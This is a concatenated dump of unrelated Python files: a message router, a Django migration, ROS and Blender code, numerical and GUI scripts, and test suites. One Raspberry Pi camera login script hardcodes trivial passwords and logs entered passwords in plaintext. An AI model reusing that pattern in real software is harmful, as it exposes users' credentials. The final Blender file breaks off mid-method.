MSG_TYPE = common_utils.enum(REQUEST=0,
RESPONSE=1,
ERROR=-1)
class QueuePair(object):
def __init__(self, recv_queue, send_queue, watch_queue=None):
self.recv = recv_queue
self.send = send_queue
self.watch = watch_queue
def get(self, *args, **kwargs):
return self.recv.get(*args, **kwargs)
def put(self, msg, *args, **kwargs):
if self.watch is not None:
self.watch.put(msg.src)
return self.send.put(msg, *args, **kwargs)
@classmethod
def create_pair(cls, queue_class=Queue.Queue,
watch_queue=None, queue_triple=False):
roli = queue_class()
rilo = queue_class()
router_queue = cls(recv_queue=rilo,
send_queue=roli)
if queue_triple:
leaf_queue = (roli, rilo, watch_queue)
else:
leaf_queue = cls(recv_queue=roli,
send_queue=rilo,
watch_queue=watch_queue)
return (router_queue, leaf_queue)
class Node(object):
def __init__(self):
self.thread = threading.Thread(target=self._main_loop)
self.thread.daemon = True
def _main_loop(self):
raise NotImplementedError()
def run_forever(self, threaded=True):
if threaded:
self.thread.start()
else:
self._main_loop()
class Client(Node):
def __init__(self, ident, router=None,
queue_triple=None, queue_class=Queue.Queue):
super(Client, self).__init__()
self.ident = ident
if queue_triple is not None and router is None:
self.queue = QueuePair(*queue_triple)
elif router is not None and queue_triple is None:
self.queue = router.add(ident, queue_class)
else:
raise TypeError("Either router or queue_triple must not be None.")
def _main_loop(self):
raise NotImplementedError()
def _send(self, msg):
self.queue.put(msg)
def _get(self):
return self.queue.get()
class Worker(Client):
def __init__(self, handler, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.handler = handler
def _main_loop(self):
while True:
msg = self._get()
if msg.type == MSG_TYPE.REQUEST:
ret = self.handler(msg)
self._send(Message(id=msg.id,
src=self.ident,
dest=msg.src,
type=MSG_TYPE.RESPONSE,
cont=ret))
elif msg.type == MSG_TYPE.RESPONSE:
self._send(Message(id=msg.id,
src=self.ident,
dest=msg.src,
type=MSG_TYPE.ERROR,
cont="Sent RESPONSE type "
"message to worker."))
class Master(Client):
class Future(object):
def __init__(self):
self.ready = threading.Event()
self.data = None
def result(self):
self.ready.wait()
return self.data
def fulfill(self, data):
self.data = data
self.ready.set()
def __init__(self, *args, **kwargs):
super(Master, self).__init__(*args, **kwargs)
self.futures = {}
def send(self, dest, msg):
future = Master.Future()
msg_id = uuid.uuid4().hex
self.futures[msg_id] = future
self._send(Message(id=msg_id,
src=self.ident,
dest=dest,
type=MSG_TYPE.REQUEST,
cont=msg))
return future
def _main_loop(self):
while True:
msg = self._get()
if msg.type == MSG_TYPE.RESPONSE:
self.futures[msg.id].fulfill(msg.cont)
del self.futures[msg.id]
elif msg.type == MSG_TYPE.REQUEST:
self._send(Message(id=msg.id,
src=self.ident,
dest=msg.src,
type=MSG_TYPE.ERROR,
cont="Send REQUEST type "
"message to master."))
class Router(Node):
def __init__(self, queue_class=Queue.Queue):
super(Router, self).__init__()
self.clients = {}
self.wait_queue = queue_class()
def _main_loop(self):
while True:
elm = self.wait_queue.get()
msg = self.clients[elm].get()
if msg.dest in self.clients:
self.clients[msg.dest].put(msg)
else:
self.clients[elm].put(Message(id=msg.id,
src=None,
dest=None,
type=MSG_TYPE.ERROR,
cont="That destination "
"does not exist."))
def add(self, ident, queue_class=Queue.Queue, queue_triple=False):
router, leaf = QueuePair.create_pair(queue_class,
self.wait_queue,
queue_triple)
self.clients[ident] = router
return leaf
|
# Generated by Django 3.0.2 on 2020-01-28 18:25
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('pages', '0002_posts'),
]
operations = [
migrations.AlterField(
model_name='posts',
name='body',
field=ckeditor.fields.RichTextField(),
),
]
|
import sys
import time
from datetime import datetime
from picamera import PiCamera
camera = PiCamera()
#camera.start_preview()
code = 1
logins = {'12345': '12345', '123': '123', '1': '1'};
with open("../logs/logs.txt", "a") as f:
match = False
if len(sys.argv) != 3:
f.write("Incorrect format, got arguments: " + str(sys.argv[1:]) + '\n')
else:
login = sys.argv[1]
passwd = sys.argv[2]
for l, p in logins.items():
if l == login and passwd == p:
match = True
break
if match:
f.write('Got match with [' + login + ', ' + passwd + ']\n')
else:
f.write('Did not get match with [' + login + ', ' + passwd + ']\n')
stime = str(datetime.now())
time.sleep(2)
f.write(stime + '\n\n')
camera.capture('../logs/' + stime + '.jpg')
if match:
code = 0
#camera.stop_preview()
sys.exit(code)
|
from alpyro_msgs import RosMessage, duration, float64, string
from alpyro_msgs.geometry_msgs.pointstamped import PointStamped
from alpyro_msgs.geometry_msgs.vector3 import Vector3
class PointHeadGoal(RosMessage):
__msg_typ__ = "control_msgs/PointHeadGoal"
__msg_def__ = "Z2VvbWV0cnlfbXNncy9Qb2ludFN0YW1wZWQgdGFyZ2V0CiAgc3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogICAgdWludDMyIHNlcQogICAgdGltZSBzdGFtcAogICAgc3RyaW5nIGZyYW1lX2lkCiAgZ2VvbWV0cnlfbXNncy9Qb2ludCBwb2ludAogICAgZmxvYXQ2NCB4CiAgICBmbG9hdDY0IHkKICAgIGZsb2F0NjQgegpnZW9tZXRyeV9tc2dzL1ZlY3RvcjMgcG9pbnRpbmdfYXhpcwogIGZsb2F0NjQgeAogIGZsb2F0NjQgeQogIGZsb2F0NjQgegpzdHJpbmcgcG9pbnRpbmdfZnJhbWUKZHVyYXRpb24gbWluX2R1cmF0aW9uCmZsb2F0NjQgbWF4X3ZlbG9jaXR5Cgo="
__md5_sum__ = "8b92b1cd5e06c8a94c917dc3209a4c1d"
target: PointStamped
pointing_axis: Vector3
pointing_frame: string
min_duration: duration
max_velocity: float64
|
#!/usr/bin/env python
import sys
import os
import glob
import argparse
import numpy
import matplotlib.pyplot as plt
def load_data(path):
# Estimate number of processors
num_procs = len(glob.glob(os.path.join(path, "jacobi_*.txt")))
# Load all data
data = []
num_points = 0
for i in range(num_procs):
data.append(numpy.loadtxt(os.path.join(path, "jacobi_%s.txt" % i)))
num_points += data[-1].shape[0]
# Create data arrays
x = numpy.empty(num_points)
U = numpy.empty(num_points)
index = 0
for i in range(num_procs):
x[index:index + data[i].shape[0]] = data[i][:, 0]
U[index:index + data[i].shape[0]] = data[i][:, 1]
index += data[i].shape[0]
return x, U
def plot_solution(x, U):
x_true, u_true = true_solution()
fig = plt.figure()
axes = fig.add_subplot(1, 1, 1)
axes.plot(x, U, 'ro')
axes.plot(x_true, u_true, 'k')
axes.set_xlim([0.0, 1.0])
axes.set_xlabel(r"$x$")
axes.set_ylim([0.0, 3.0])
axes.set_ylabel(r"$u(x)$")
axes.set_title(r"Solution to $u_{xx} = f(x)$")
return fig
def true_solution():
x = numpy.linspace(0.0, 1.0, 1000)
U = (4.0 - numpy.exp(1.0)) * x - 1.0 + numpy.exp(x)
return x, U
if __name__ == '__main__':
path = os.getcwd()
if len(sys.argv) > 1:
path = sys.argv[1]
x, U = load_data(path)
fig = plot_solution(x, U)
fig.savefig("jacobi.png")
plt.show() |
#!/usr/bin/env python
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# script to run an abc test on a windows mobile emulator
# - requires the wmrunner.exe program to be running in the emulator
import os,sys,shutil,time,datetime,random,re
def runTest():
global startime
dir=None
# search for an unlocked emulator directory
while dir==None:
dirs=os.listdir(dirbase)
random.shuffle(dirs)
# print("SHELL: looking for free emulator : %d" % (time.time()-starttime))
for eachdir in dirs:
try:
sdate=str(datetime.datetime.today())+"\n"
if os.path.isdir(dirbase+'/'+eachdir) and os.path.exists(dirbase+'/'+eachdir+'/lock')==False:
file=open(dirbase+'/'+eachdir+'/lock','w')
file.write(sdate)
file.close()
dir=dirbase+'/'+eachdir
time.sleep(.1)
file=open(dir+'/lock','r')
sdateread=file.read()
file.close()
if sdateread!=sdate:
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,'ERROR: writing lock file')
time.sleep(.1)
if os.path.exists(dir+'/lock')==False:
print("ERROR: lock file does not exist")
return (-1,'ERROR: lock file does not exist')
break
except:
print("ERROR: exception lock file")
try:
os.unlink(dir+"/lock")
except:
pass
return (-1,"ERROR: exception writing lock file")
time.sleep(.1)
# print("SHELL: running emulator %s : %d" % (dir,time.time()-starttime))
ddir="\\Storage Card\\media"
cmdfile=dir+"/nextvm.txt"
dlog='%s/media/%s.log' % (dir,base)
dabc='%s/media/%s.abc' % (dir,base)
exitcodefile='%s.exitcode' % dabc
ctr=0
# clean up old log and abc files
try:
ctr=0
while os.path.exists(cmdfile) and ctr<20:
time.sleep(.1)
ctr+=1
if os.path.exists(dlog):
os.unlink(dlog)
if os.path.exists(dabc):
os.unlink(dabc)
if os.path.exists(exitcodefile):
os.unlink(exitcodefile)
except:
print("ERROR: exception deleting file")
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: exception deleting file")
args=""
newdlog=None
for arg in sys.argv[1:-1]:
if re.search('.abc',arg)!=None:
shutil.copy(cwd+'/'+arg,dir+'/media')
if arg.find('/')>-1:
arg=arg[arg.rfind('/')+1:]
args+=' \"%s\%s\" ' % (ddir,arg)
if newdlog==None:
dlog='%s/media/%s.log' % (dir,arg[0:arg.find('.')])
newdlog=dlog
try:
if os.path.exists(dlog):
os.unlink(dlog)
except:
return (-1,"ERROR: deleting log file %s" % dlog)
else:
args+=' '+arg
# copy .abc test to the emulator directory
try:
shutil.copy(cwd+"/"+abc,dabc)
except:
print("ERROR: copying abc file")
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: copying abc file")
try:
file=open(cmdfile,"w")
file.write("-log %s \"%s\%s.abc\" " % (args,ddir,base))
file.close()
except:
print("ERROR: write command file failed")
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: write command file failed")
# wait until emulator deletes nextvm.txt command file
# print("SHELL: wrote file %s : %d" % (cmdfile,time.time()-starttime))
while os.path.exists(cmdfile):
time.sleep(.1)
# print("SHELL: detected test finished %d" % (time.time()-starttime))
if os.path.exists(dlog)==False:
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: cannot find log %s" % dlog)
ctr=0
while os.path.exists(dlog)==False and ctr<50:
time.sleep(.1)
ctr+=1
# read the exitcode file
exitcode=0
ctr=0
while os.path.exists(exitcodefile)==False and ctr<50:
time.sleep(.4)
ctr+=1
if os.path.exists(exitcodefile):
try:
file=open(exitcodefile,'r')
exitcodestr=file.read()
exitcode=int(exitcodestr.strip())
file.close()
except:
print('exception reading exit code file')
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"exception reading exit code file")
else:
print("ERROR: cannot find exit code file %s" % exitcodefile)
if os.path.exists(dir+'/lock'):
os.unlink(dir+'/lock')
return (-1,"ERROR: cannot find exit code file %s" % exitcodefile)
# remove lock, another thread can use the emulator while the shell reads the output log
# print("SHELL: finished %s : %d" % (abc,time.time()-starttime))
try:
os.unlink(dir+'/lock')
except:
print("exception deleting %s/lock" % dir)
return (-1,"exception deleting %s/lock" %dir)
# read and print the log file
try:
file=open(dlog,'r')
sysout=file.read()
print(sysout)
except:
print("ERROR: failed to read log %s" % dlog)
return (-1,"ERROR: failed to read log %s" % dlog)
return (exitcode,"succeeded")
# main
if len(sys.argv)==1:
print("ERROR: not enough arguments, usage: %s arguments... test_file.abc" % sys.argv[0])
sys.exit(1)
starttime=time.time()
cwd=os.getcwd()
# abc to test
abc=sys.argv[-1]
# flatten the directory path
abc=abc.replace('/','\\')
base=abc[0:abc.rfind('.')].replace('\\','_')
# find an available emulator, all emulators representing by directories under dirbase
dirbase=cwd+"/../util/emulator_files"
if 'EMULATORDIR' in os.environ:
dirbase=os.environ['EMULATORDIR'].strip()
if os.path.isdir(dirbase)==False:
print("ERROR: emulator directory '%s' not found" % dirbase)
sys.exit(1)
# if .log file is not written try multiple attempts
attempts=0
retrys=0
while retrys<5:
#print("attempt %d, retry %d" % (attempts,retrys))
(res,sysout)=runTest()
#print("exit code=%d reason=%s" % (res,sysout))
if res!=-1 and res!=1:
sys.exit(res)
attempts+=1
if res==1:
retrys+=1
time.sleep(1)
try:
file=open(dirbase+'/../failures.log','a')
file.write("%s attempt %d %s %s\n" %(str(datetime.datetime.today()),attempts,sys.argv[1:],sysout))
file.close()
except:
print("ERROR: writing failures.log")
time.sleep(1)
sys.exit(res)
|
import numpy as np
from ..util.errors import NumericalPrecisionError
from ..util.opt import partial_nn_opt
from .coreset import Coreset
class BatchPSVICoreset(Coreset):
def __init__(self, data, ll_projector, opt_itrs, n_subsample_opt=None, step_sched=lambda m: lambda i : 1./(1.+i), mup=None, Zmean=None, SigpInv=None, diagnostics=False, **kw):
self.data = data
self.ll_projector = ll_projector
self.opt_itrs = opt_itrs
self.n_subsample_opt = None if n_subsample_opt is None else min(data.shape[0], n_subsample_opt)
self.step_sched = step_sched
self.mup = mup
self.SigpInv = SigpInv
super().__init__(**kw)
def _build(self, itrs, sz):
# initialize the points via full dataset subsampling
init_idcs = np.random.choice(self.data.shape[0], size=sz, replace=False)
self.pts = self.data[init_idcs]
self.wts = self.data.shape[0]/sz*np.ones(sz)
self.idcs = init_idcs
# run gradient optimization for opt_itrs steps
self._optimize()
def _get_projection(self, n_subsample, w, p):
#update the projector
self.ll_projector.update(w, p)
#construct a tangent space
if n_subsample is None:
sub_idcs = None
vecs = self.ll_projector.project(self.data)
sum_scaling = 1.
else:
sub_idcs = np.random.randint(self.data.shape[0], size=n_subsample)
vecs = self.ll_projector.project(self.data[sub_idcs])
sum_scaling = self.data.shape[0]/n_subsample
if p.size > 0:
corevecs, pgrads = self.ll_projector.project(p, grad=True)
else:
corevecs, pgrads = np.zeros((0, vecs.shape[1])), np.zeros((0, vecs.shape[1], p.shape[1]))
return vecs, sum_scaling, sub_idcs, corevecs, pgrads
def _optimize(self):
sz = self.wts.shape[0]
d = self.pts.shape[1]
def grd(x):
w = x[:sz]
p = x[sz:].reshape((sz, d))
vecs, sum_scaling, sub_idcs, corevecs, pgrads = self._get_projection(self.n_subsample_opt, w, p)
#compute gradient of weights and pts
resid = sum_scaling*vecs.sum(axis=0) - w.dot(corevecs)
wgrad = -corevecs.dot(resid) / corevecs.shape[1]
ugrad = -(w[:, np.newaxis, np.newaxis]*pgrads*resid[np.newaxis, :, np.newaxis]).sum(axis=1)/corevecs.shape[1]
#return reshaped grad
grad = np.hstack((wgrad, ugrad.reshape(sz*d)))
return grad
x0 = np.hstack((self.wts, self.pts.reshape(sz*d)))
xf = partial_nn_opt(x0, grd, np.arange(sz), self.opt_itrs, step_sched = self.step_sched(sz))
self.wts = xf[:sz]
self.pts = xf[sz:].reshape((sz, d))
def error(self):
return 0. #TODO: implement KL estimate
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
from src import Menu
from src import Content
from src import Transfer
from src import Constants
from PyQt5.QtGui import QIcon
from PyQt5 import QtWidgets, uic
from PyQt5.QtWidgets import QFileDialog
import ctypes
try:
temp1 = ctypes.windll.LoadLibrary('../DLL/api-ms-win-crt-runtime-l1-1-0.dll')
except:
pass
qtCreatorFile = "launcher.ui"
Ui_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)
class PyQtApp(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
# 设置窗口图标
self.setWindowIcon(QIcon(Constants.ICON_ANDROID))
self.menu_bar = Menu.Menu(self)
self.menu_bar.addMenu()
self.select_button.clicked.connect(self.selectFile)
self.convert_button.clicked.connect(self.converter)
self.content = Content.Content()
def converter(self):
self.output_log(self.content.seprate())
if self.density_edit.toPlainText() and self.scale_density_edit.toPlainText() and self.xdpi_edit.toPlainText() and self.file_path_edit.toPlainText():
Transfer.Transfer(float(self.density_edit.toPlainText()), float(self.scale_density_edit.toPlainText()),
float(self.xdpi_edit.toPlainText()), str(self.file_path_edit.toPlainText())).generator(
self.output_log)
else:
self.output_log(self.content.param_error())
def selectFile(self):
""" select xml file """
file_name, file_type = QFileDialog.getOpenFileName(self, Constants.dialog_title, Constants.dialog_init_path,
Constants.dialog_file_type)
self.output_log(self.content.output_file_path() % file_name)
self.file_path_edit.append(file_name)
def output_log(self, log_info):
""" output info to consle """
if log_info:
self.output_edit.append('\n' + log_info)
# print('\n' + log_info)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
window = PyQtApp()
window.show()
sys.exit(app.exec_())
|
import numpy as np
import pytest
from continuum.scenarios import Rotations
from tests.test_classorder import InMemoryDatasetTest
from continuum.datasets import MNIST, CIFAR100
@pytest.fixture
def numpy_data():
nb_classes = 6
nb_data = 100
x_train = []
y_train = []
for i in range(nb_classes):
x_train.append(np.ones((nb_data, 4, 4, 3), dtype=np.uint8) * i)
y_train.append(np.ones(nb_data) * i)
x_train = np.concatenate(x_train)
y_train = np.concatenate(y_train)
x_test = np.copy(x_train)
y_test = np.copy(y_train)
return (x_train, y_train.astype(int)), (x_test, y_test.astype(int))
'''
Test the initialization with three tasks
'''
def test_init(numpy_data):
train, test = numpy_data
dummy = InMemoryDatasetTest(*train)
Trsf_0 = 0
Trsf_1 = (15, 20)
Trsf_2 = 45
list_degrees = [Trsf_0, Trsf_1, Trsf_2]
scenario = Rotations(cl_dataset=dummy, nb_tasks=3, list_degrees=list_degrees)
for task_id, train_dataset in enumerate(scenario):
continue
@pytest.mark.parametrize("shared_label_space", [True, False])
def test_shared_labels(numpy_data, shared_label_space):
train, test = numpy_data
dummy = InMemoryDatasetTest(*train)
list_degrees = [0, 15, 45]
scenario = Rotations(cl_dataset=dummy, nb_tasks=3, list_degrees=list_degrees, shared_label_space=shared_label_space)
previous_classes = None
for task_id, taskset in enumerate(scenario):
classes = taskset.get_classes()
if task_id > 0:
if shared_label_space:
assert (classes == previous_classes).all()
else:
assert (classes == previous_classes + len(classes)).all()
previous_classes = classes
def test_fail_init(numpy_data):
train, test = numpy_data
dummy = InMemoryDatasetTest(*train)
Trsf_0 = 2
Trsf_1 = (15, 20, 25) # non sens
Trsf_2 = 45
list_degrees = [Trsf_0, Trsf_1, Trsf_2]
# should detect that a transformation is non-sens in the list
with pytest.raises(ValueError):
Rotations(cl_dataset=dummy, nb_tasks=3, list_degrees=list_degrees)
@pytest.mark.slow
@pytest.mark.parametrize("shared_label_space", [True, False])
@pytest.mark.parametrize("dataset", [MNIST, CIFAR100])
def test_with_dataset(dataset, shared_label_space):
dataset = dataset(data_path="./tests/Datasets", download=True, train=True)
list_degrees = [0, 45, 90]
scenario = Rotations(cl_dataset=dataset,
nb_tasks=3,
list_degrees=list_degrees,
shared_label_space=shared_label_space)
for task_id, taskset in enumerate(scenario):
classes = taskset.get_classes()
if shared_label_space:
assert len(classes) == classes.max() + 1
else:
assert len(classes) == classes.max() + 1 - (task_id * len(classes))
|
#!/usr/bin/env python
#coding:utf-8
# Created: 21.02.2010
# Copyright (C) 2010, Manfred Moitzi
# License: MIT License
__author__ = "mozman <[email protected]>"
import unittest
from dxfwrite.base import dxfstr
from dxfwrite.entities import Insert, Attrib
class TestInsert(unittest.TestCase):
def test_insert_simple(self):
insert = Insert(blockname='empty')
expected = " 0\nINSERT\n 8\n0\n 2\nempty\n 10\n0.0\n 20\n0.0\n 30\n0.0\n"
self.assertEqual(dxfstr(insert), expected)
def test_insert_all_attribs(self):
insert = Insert(
attribs_follow = 1,
blockname='empty',
xscale=1.0,
yscale=2.0,
zscale=3.0,
rotation=30.0,
columns=2,
rows=7,
colspacing=1.7,
rowspacing=2.9
)
expected = " 0\nINSERT\n 8\n0\n 66\n1\n 2\nempty\n" \
" 10\n0.0\n 20\n0.0\n 30\n0.0\n" \
" 41\n1.0\n 42\n2.0\n 43\n3.0\n 50\n30.0\n" \
" 70\n2\n 71\n7\n 44\n1.7\n 45\n2.9\n"
self.assertEqual(dxfstr(insert), expected)
def test_add_attrib_absolute(self):
block_ref = Insert(blockname='TestAttrib',
insert=(5, 5),
rotation=30)
attrib = Attrib(
insert=(1, 1),
rotation=15,
tag='TEST',
text='attrib',
)
block_ref.add(attrib, relative=False)
inserted_attrib = block_ref.data[0]
self.assertEqual(inserted_attrib['rotation'], 15.)
self.assertEqual(inserted_attrib['insert']['xy'], [1., 1.])
def test_add_attrib_relative(self):
# insert blockref with 45 degree rotation
block_ref = Insert(blockname='TestAttrib',
insert=(0, 0),
rotation=45)
attrib = Attrib(
insert=(1, 1),
rotation=45, # 45 degree relative to original block definition
tag='TEST',
text='attrib',
)
block_ref.add(attrib, relative=True) # result rotation = 45 + 45 = 90
inserted_attrib = block_ref.data[0]
self.assertEqual(inserted_attrib['rotation'], 90.)
self.assertAlmostEqual(inserted_attrib['insert']['x'], 0, places=3)
self.assertAlmostEqual(inserted_attrib['insert']['y'], 1.4142, places=3) # y = sqrt(2)
if __name__=='__main__':
unittest.main()
|
#### PATTERN | FR ##################################################################################
# Copyright (c) 2012 University of Antwerp, Belgium
# Author: Tom De Smedt <[email protected]>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
####################################################################################################
# French linguistical tools using fast regular expressions.
from inflect import \
predicative, attributive
from parser.sentiment import sentiment, polarity, subjectivity, positive
from parser.sentiment import NOUN, VERB, ADJECTIVE, ADVERB |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the Routing slip Class.
Test-Suite to ensure that the Roting slip Class is working as expected.
"""
from faker import Faker
from pay_api.models import RoutingSlip
from tests.utilities.base_test import factory_payment_account, factory_routing_slip
fake = Faker()
def test_routing_slip_find_creation(session):
"""Assert a routing slip is stored.
Start with a blank database.
"""
payment_account = factory_payment_account()
payment_account.save()
rs = factory_routing_slip(payment_account_id=payment_account.id)
rs.save()
assert rs.id is not None
routing_slip = RoutingSlip()
assert routing_slip.find_by_number(rs.number) is not None
def test_routing_slip_find_search(session):
"""Assert a routing slip is stored.
Start with a blank database.
"""
payment_account = factory_payment_account()
payment_account.save()
rs = factory_routing_slip(number=fake.name(), payment_account_id=payment_account.id)
rs.save()
for i in range(20):
factory_routing_slip(number=fake.name(), payment_account_id=payment_account.id).save()
routing_slip = RoutingSlip()
search_dict = {'routingSlipNumber': rs.number}
res, count = routing_slip.search(search_dict, page=1, limit=1, max_no_records=50, return_all=True)
assert count == 50
assert len(res) == 1, 'searched with routing slip.so only one record'
res, count = routing_slip.search({}, page=1, limit=1, max_no_records=50, return_all=True)
assert count == 50
assert len(res) == 21, 'retun all true ;so shud return all records'
res, count = routing_slip.search({}, page=1, limit=1, max_no_records=50, return_all=False)
assert count == 21
assert len(res) == 1, 'return all false'
|
import os
import sys
import bpy
import json
import argparse
import mathutils
import numpy as np
materials_path = os.path.dirname(os.path.realpath(__file__)) + '/materials.blend'
#################################################
# https://stackoverflow.com/questions/28075599/opening-blend-files-using-blenders-python-api
from bpy.app.handlers import persistent
@persistent
def load_handler(dummy):
print("Load Handler:", bpy.data.filepath)
bpy.app.handlers.load_post.append(load_handler)
#################################################
class BlockScene:
'''
blendfile : The .blend world file
scenefile : Either a .json file of parameters or a dictionary of the same
structure
frames : The total number of frames to render
(optional) warmup : (default 6) The number of frames to bake prior to
rendering. Sets the total number of bakes frames to `frames` + `warmup`
'''
def __init__(self, scene_json, trace = None, wire_frame = False):
# Initialize attributes
self.wire_frame = wire_frame
self.trace = trace
# Clear scene
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_by_type(type='MESH')
bpy.ops.object.delete(use_global=False)
for item in bpy.data.meshes:
bpy.data.meshes.remove(item)
# Load materials and textures
with Suppressor():
bpy.ops.wm.open_mainfile(filepath=materials_path)
if not trace is None:
frames = len(trace['position'])
else:
frames = 1
bpy.context.scene.frame_set(1)
bpy.context.scene.frame_end = frames + 1
# bpy.context.scene.frame_step = bp
# Parse tower structure
self.load_scene(scene_json)
def select_obj(self, obj):
"""
Brings the given object into active context.
"""
bpy.ops.object.select_all(action='DESELECT')
obj.select = True
bpy.context.scene.objects.active
bpy.context.scene.update()
def rotate_obj(self, obj, rot):
"""
Rotates the given object by the given quaternion.
"""
self.select_obj(obj)
obj.rotation_mode = 'QUATERNION'
obj.rotation_quaternion = np.roll(rot, 1) # [3, 0, 1, 2]
bpy.context.scene.update()
def move_obj(self, obj, pos):
"""
Moves the given object by the given 3-d vector.
"""
self.select_obj(obj)
pos = mathutils.Vector(pos)
obj.location = pos
bpy.context.scene.update()
def scale_obj(self, obj, dims):
"""
Rescales to the object to the given dimensions.
"""
self.select_obj(obj)
obj.dimensions = dims
bpy.context.scene.update()
bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY')
bpy.context.scene.update()
def set_appearance(self, obj, mat):
"""
Assigns a material to a block.
"""
if not mat in bpy.data.materials:
raise ValueError('Unknown material {}'.format(mat))
obj.active_material = bpy.data.materials[mat]
bpy.context.scene.update()
def create_block(self, object_d):
"""
Initializes a block object.
"""
bpy.ops.mesh.primitive_cube_add(location=object_d['data']['pos'],
view_align=False,
enter_editmode=False)
ob = bpy.context.object
ob.name = '{0:d}'.format(object_d['id'])
ob.show_name = True
me = ob.data
me.name = '{0:d}_Mesh'.format(object_d['id'])
self.scale_obj(ob, object_d['data']['dims'])
ob.matrix_world.translation
if 'appearance' in object_d['data'] and \
'substance' in object_d['data']:
mat = object_d['data']['appearance']
mass = object_d['data']['substance']['density'] * \
np.prod(object_d['data']['dims'])
friction = object_d['data']['substance']['friction']
else:
mat = 'Wood'
phys_key = 'Wood'
mass = substances.density[phys_key] * \
np.prod(object_d['data']['dims'])
friction = substances.friction[phys_key]
self.set_appearance(ob, mat)
if self.wire_frame:
if ob.name == '5':
self.set_appearance(ob, 'L')
bpy.ops.object.mode_set(mode='EDIT')
# bpy.ops.mesh.subdivide()
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.modifier_add(type='WIREFRAME')
ob.modifiers['Wireframe'].thickness = 0.2
def set_base(self, block):
"""
Creates the table on which the blocks will stand.
"""
bpy.ops.mesh.primitive_cylinder_add(
location = block['pos'],
view_align=False,
enter_editmode=False)
ob = bpy.context.object
ob.name = 'base'
ob.show_name = False
ob.data.name = '{}_Mesh'.format('base')
self.scale_obj(ob, (40, 40, 1))
self.set_appearance(ob, 'Marble')
if self.wire_frame:
ob.cycles_visibility.diffuse = False
ob.hide = True
ob.hide_render = True
def set_block(self, block):
"""
Initializes blocks described in the block.
"""
if block['id'] == 0:
self.set_base(block['data'])
else:
self.create_block(block)
def load_scene(self, scene_dict):
# with open(scenefl, 'rU') as fl:
if isinstance(scene_dict, str):
scene_dict = json.loads(scene_dict)
for block in scene_dict:
self.set_block(block)
def set_rendering_params(self, resolution):
"""
Configures various settings for rendering such as resolution.
"""
bpy.context.scene.render.fps = 60
bpy.context.scene.render.resolution_x = resolution[0]
bpy.context.scene.render.resolution_y = resolution[1]
bpy.context.scene.render.resolution_percentage = 100
bpy.context.scene.cycles.samples = 500
bpy.context.scene.render.tile_x = 24
bpy.context.scene.render.tile_y = 24
bpy.context.scene.render.engine = 'CYCLES'
def set_camera(self, rot):
"""
Moves the camera along a circular path.
Arguments:
rot (float): angle in degrees along path (0, 360).
"""
radius = 13.0
theta = np.pi * (rot / 180.0)
# Move camera to position on ring
xyz = [np.cos(theta) * radius, np.sin(theta) * radius, 1]
camera = bpy.data.objects['Camera']
camera.location = xyz
bpy.context.scene.update()
# Face camera towards point
loc_camera = camera.matrix_world.to_translation()
direction = mathutils.Vector([0,0,3]) - loc_camera
# point the cameras '-Z' and use its 'Y' as up
rot_quat = direction.to_track_quat('-Z', 'Y')
self.rotate_obj(camera, rot_quat)
def frame_set(self, frame):
bpy.context.scene.frame_set(frame)
positions = np.array(self.trace['position'][frame])
rotations = np.array(self.trace['rotation'][frame])
n_blocks = positions.shape[0]
for block_i in range(n_blocks):
block = bpy.data.objects['{}'.format(block_i + 1)]
self.move_obj(block, positions[block_i])
self.rotate_obj(block, rotations[block_i])
block.keyframe_insert(data_path='location', index = -1)
block.keyframe_insert(data_path='rotation_quaternion', index = -1)
bpy.context.scene.update()
def render(self, output_name, frames, show = [],
resolution = (256, 256), camera_rot = None):
"""
output_name: Path to save frames
frames: a list of frames to render (shifted by warmup)
show: a list of object names to render
"""
if not os.path.isdir(output_name):
os.mkdir(output_name)
self.set_rendering_params(resolution)
if len(show) > 0:
for obj in bpy.context.scene.objects:
if not obj.name in show:
# print("Hiding {0!s}".format(o_name))
obj.cycles_visibility.diffuse = False
obj.hide = True
obj.hide_render = True
if camera_rot is None:
camera_rot = np.zeros(len(frames))
for i, (frame, cam) in enumerate(zip(frames, camera_rot)):
out = os.path.join(output_name, '{0:d}'.format(i))
if os.path.isfile(out + '.png'):
print('Frame {} already rendered'.format(frame))
continue
bpy.context.scene.render.filepath = out
self.set_camera(cam)
self.frame_set(frame)
bpy.ops.render.render(write_still=True)
def render_circle(self, out_path, freeze = True, dur = 1,
resolution = (256, 256)):
"""
Renders a ring around a tower.
Arguments:
out_path (str): Path to save frames.
freeze (bool): Whether or not to run physics.
dur (float, optional): Duration in seconds.
resolution (float, optional): Resolution of render.
"""
self.set_rendering_params(resolution)
n = int(dur * bpy.context.scene.render.fps)
rots = np.linspace(0, 360, n)
if freeze == True:
frames = np.zeros(n).astype(int)
else:
frames = np.arange(n)
self.render(out_path, frames, resolution = resolution,
camera_rot = rots)
def save(self, out):
"""
Writes the scene as a blend file.
"""
